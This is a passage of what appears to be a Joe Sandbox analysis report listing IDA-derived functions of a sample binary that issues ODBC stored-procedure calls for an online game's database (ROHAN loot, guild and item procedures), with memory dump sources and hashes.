                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 004364FC
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_DelLootItem](?)}, xrefs: 0043647F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_DelLootItem](?)}
                                                                                      • API String ID: 0-567900136
                                                                                      • Opcode ID: 50109ba548eb4aa6e0cf6e4c237a9aa964bb044691ff8898fb680a7ec0592221
                                                                                      • Instruction ID: aa455963f57553aa499d7634f5a4f2691cb0051695b8003bfd61b5e9c9b60a1d
                                                                                      • Opcode Fuzzy Hash: 50109ba548eb4aa6e0cf6e4c237a9aa964bb044691ff8898fb680a7ec0592221
                                                                                      • Instruction Fuzzy Hash: 2011ECB5A44219EBFB24CF54CC42FAA7774EB44714F218389F6186B2C4DAB5A940CF58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_ClearNGuildPostBox] (?) } ,000000FD), ref: 00425445
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00425484
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 004254B9
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_ClearNGuildPostBox] (?) } , xrefs: 0042543C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_ClearNGuildPostBox] (?) }
                                                                                      • API String ID: 0-177149280
                                                                                      • Opcode ID: 7dcf29ec7b1e5f008e12a5e83e9f8331b4fa682c9c6f2c480584c537bac7d3ac
                                                                                      • Instruction ID: 656aed9da2bfcdcaa2d5c56eb491b0803885276eb9958aa078db07cddd1f9f6e
                                                                                      • Opcode Fuzzy Hash: 7dcf29ec7b1e5f008e12a5e83e9f8331b4fa682c9c6f2c480584c537bac7d3ac
                                                                                      • Instruction Fuzzy Hash: D911ECB5A40658EBEB64CF44CC56FEA7374EB84719F204289F6187E3C0DAB569808F58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_GetEventItemList](?) } ,000000FD), ref: 0042758A
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 004275C9
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 004275FE
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_GetEventItemList](?) } , xrefs: 00427581
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_GetEventItemList](?) }
                                                                                      • API String ID: 0-579189525
                                                                                      • Opcode ID: ca5dc42974452ceb63b27715d83bc325b1f4a94aa123bd606ed76a5c64922ac2
                                                                                      • Instruction ID: 56cf096e100d8f687d18210193bdd0228549fcbc180abab33abbbe68e7adc68c
                                                                                      • Opcode Fuzzy Hash: ca5dc42974452ceb63b27715d83bc325b1f4a94aa123bd606ed76a5c64922ac2
                                                                                      • Instruction Fuzzy Hash: 411100B1A50219ABEB64DF44CC56FAE7374EB44B18F204289F71C6B2D0DAB56D808F58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_DelLootMoney](?)},000000FD), ref: 0043652F
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0043656E
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 004365A3
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_DelLootMoney](?)}, xrefs: 00436526
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_DelLootMoney](?)}
                                                                                      • API String ID: 0-3170926589
                                                                                      • Opcode ID: 0422deb800bd877d6c08aaf5fe103b150304642ebce19a8239c25fc36e07414b
                                                                                      • Instruction ID: 8f9967431b4042d5af174adc7d62253f4fc9842210251df79691fb9f0bef8b43
                                                                                      • Opcode Fuzzy Hash: 0422deb800bd877d6c08aaf5fe103b150304642ebce19a8239c25fc36e07414b
                                                                                      • Instruction Fuzzy Hash: DD11E2B1A4421CABFB24CF54CD41FD97374EB45714F204789F6246A2C5DAB569C08F58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_GetSubGuild](?) } ,000000FD), ref: 0042B562
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0042B5A1
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0042B5D6
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_GetSubGuild](?) } , xrefs: 0042B559
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_GetSubGuild](?) }
                                                                                      • API String ID: 0-1611532322
                                                                                      • Opcode ID: b1ca3f660b0e162e90caef382f1177845eb849a64160229cadf6044cc1df7cb2
                                                                                      • Instruction ID: e7446c5e793f2da010ded6eb9289aa7a3b57bb962438dd17e51288a7deb0e8ec
                                                                                      • Opcode Fuzzy Hash: b1ca3f660b0e162e90caef382f1177845eb849a64160229cadf6044cc1df7cb2
                                                                                      • Instruction Fuzzy Hash: 2D11EFB0A45218ABFB25DF84CC51FAA7378FB84714F1092CDF618BA3C4C6B56A408F58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_DelSubGuild](?) } ,000000FD), ref: 0042B6E8
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0042B727
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0042B75C
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_DelSubGuild](?) } , xrefs: 0042B6DF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_DelSubGuild](?) }
                                                                                      • API String ID: 0-532444305
                                                                                      • Opcode ID: 91a6824d1c456ce75097fb0e3a2a8f984bcacf661537bc41356f5b18c9504180
                                                                                      • Instruction ID: aaf4becd1f299601a0276e2158bb167c1b78c82435729b18cfabd56a94b376ac
                                                                                      • Opcode Fuzzy Hash: 91a6824d1c456ce75097fb0e3a2a8f984bcacf661537bc41356f5b18c9504180
                                                                                      • Instruction Fuzzy Hash: E811F1B1A44258ABDB25CF44CCA2F9E7379EB48714F10438AF6186A2C4D6B56A408F58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_DestroyNGuild] (?) } ,000000FD), ref: 00425A98
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00425AD7
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00425B0C
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_DestroyNGuild] (?) } , xrefs: 00425A8F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_DestroyNGuild] (?) }
                                                                                      • API String ID: 0-199569042
                                                                                      • Opcode ID: 9cd6f1947f0cd23c08a8c43bd95971b23c4f9151f13bb0fb38094f66a223df14
                                                                                      • Instruction ID: 47708bb1fbb83cdf4082622ba36865f2720efb8dde384bc06b0ffbfc918d79b7
                                                                                      • Opcode Fuzzy Hash: 9cd6f1947f0cd23c08a8c43bd95971b23c4f9151f13bb0fb38094f66a223df14
                                                                                      • Instruction Fuzzy Hash: 1F11ECB1B45218BFFF24CF44CC42FEA7374EB85714F208289F6586E2C4D6B5A9908B59
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_GetItemOfCharacter] (?)},000000FD), ref: 0042C3D3
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0042C412
